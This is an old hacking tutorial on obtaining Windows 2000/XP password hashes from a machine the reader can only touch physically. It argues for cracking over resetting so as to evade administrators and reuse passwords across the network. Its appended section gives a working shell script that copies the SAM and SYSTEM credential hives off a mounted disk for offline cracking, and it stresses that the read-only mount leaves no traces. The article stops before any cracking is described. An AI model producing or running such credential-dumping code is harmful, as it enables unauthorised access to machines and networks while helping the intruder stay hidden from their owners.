Cracking Windows 2000 And XP Passwords With Only Physical Access

This article will cover how to crack Windows 2000/XP passwords with only physical access to the target box. I won't be covering the internal structure of LM and NTLM hashes or what makes them so insecure; there are many other articles on the Internet that cover the basics of NT security, so I recommend that you Google for them. I will assume that the reader already knows the basics. There are a lot of articles floating around that tell interested parties how to use programs like PWDump to get NT password hashes. Using PWDump is what most folks recommend when Syskey is enabled on a system, since the hashes in the SAM file are then encrypted. The problem is that PWDump only works if you can run it from an administrator-level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator account, then PWDump is of little use.

Another question I get is why crack the password at all, since one can get access to the machine by just deleting the SAM file and logging in with a blank password (Windows 2000 only) or by using a Linux password reset boot disk (get one from http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html ; it works on both 2000 and XP) and resetting the password to whatever we like. The reason an attacker may want to crack the local password instead of changing it is twofold:

1. An attacker doesn't want to tip off the system administrators. If they notice that the old admin password no longer works, they will get a bit suspicious, don't you think?
2. The same account passwords may be used on other systems on the network. If the attacker can crack one machine's admin password, that same password may allow the attacker to gain access to other boxes on the LAN that they only have remote access to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack, and that they also have a bootable disk that can read the file system on the target machine. An attacker may have to get into the BIOS to set it to boot from the floppy or CD-ROM, so setting a BIOS password will help, but if they can get into the case it's easy to reset. Any old Windows 9x boot disk should work for FAT32 drives; on NTFS drives I've used the Knoppix ( http://www.knoppix.org/ ) and PE Builder ( http://www.nu2.nu/pebuilder/ ) boot CDs with good success.
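As an added example (not part of the original article), here is a small POSIX shell script of the kind one would run from a Knoppix or similar live CD once the target's partition has been mounted read-only. It locates the Windows configuration directory (WINNT on a default Windows 2000 install, WINDOWS on XP) and copies out the SAM hive together with the SYSTEM hive. SYSTEM is taken as well because, when Syskey is enabled, the key that encrypts the hashes inside SAM is derived from values stored in the SYSTEM hive, so SAM alone cannot be cracked. The mount point and output directory are hypothetical arguments; nothing on the target volume is written.

```shell
#!/bin/sh
# Added example, not from the original article: copy the SAM and SYSTEM
# registry hives off a mounted Windows 2000/XP volume for offline cracking.
# Assumptions (hypothetical): the target partition is already mounted
# read-only at $1, e.g. from a Knoppix CD with
#     mount -o ro /dev/hda1 /mnt/hda1
# and $2 is a writable directory (USB stick, ramdisk) for the copies.

find_config_dir() {
    # $1 = mount point. Prints the system32/config directory or fails.
    # Windows 2000 normally installs to WINNT, XP to WINDOWS; case varies
    # with how the NTFS/FAT32 driver presents names, so try a few spellings.
    mnt=$1
    for sysroot in WINDOWS WINNT Windows winnt windows; do
        d="$mnt/$sysroot/system32/config"
        if [ -d "$d" ]; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

grab_hives() {
    # $1 = mount point, $2 = output directory.
    # Copies both SAM and SYSTEM: with Syskey enabled the key protecting
    # the hashes in SAM comes from the SYSTEM hive, so both are required.
    mnt=$1
    out=$2
    cfg=$(find_config_dir "$mnt") || {
        echo "no Windows config directory found under $mnt" >&2
        return 1
    }
    mkdir -p "$out" || return 1
    for hive in SAM SYSTEM; do
        # Hive file names on disk may be upper or lower case; match either.
        src=$(find "$cfg" -maxdepth 1 -type f -iname "$hive" | head -n 1)
        if [ -z "$src" ]; then
            echo "missing $hive hive in $cfg" >&2
            return 1
        fi
        cp "$src" "$out/$hive" || return 1
    done
    # Checksums let you show later that the copied hives were not altered.
    (cd "$out" && md5sum SAM SYSTEM > hives.md5) || return 1
    return 0
}

# Stand-alone usage: grab_hives.sh <mount point> <output dir>
if [ "$#" -eq 2 ]; then
    grab_hives "$1" "$2"
fi
```

Mounting the volume read-only matters for the first reason the article gives for cracking rather than resetting: a read-only mount leaves no modified files or timestamps behind for an administrator to notice. Once the two hives are on removable media, they can be cracked offline on any machine; nothing further needs to be run on the target.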
